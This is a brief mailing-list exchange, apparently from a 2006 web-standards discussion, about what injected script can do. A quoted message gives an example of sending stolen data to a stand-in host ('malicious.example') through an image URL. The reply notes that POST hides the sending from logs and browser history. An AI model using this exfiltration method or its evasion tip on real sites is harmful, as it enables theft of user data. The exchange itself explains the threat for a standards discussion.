On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
If you are able to inject some script you can send any and all data you are able to obtain to a third party, in a simple case you could just append the data to a new <img src="http://malicious.example/?data=...";>. So I don't think I understand your concern, could you elaborate?
You're right of course, but it's much easier to hide the data being sent from logs and browser history if you use POST.
Ian
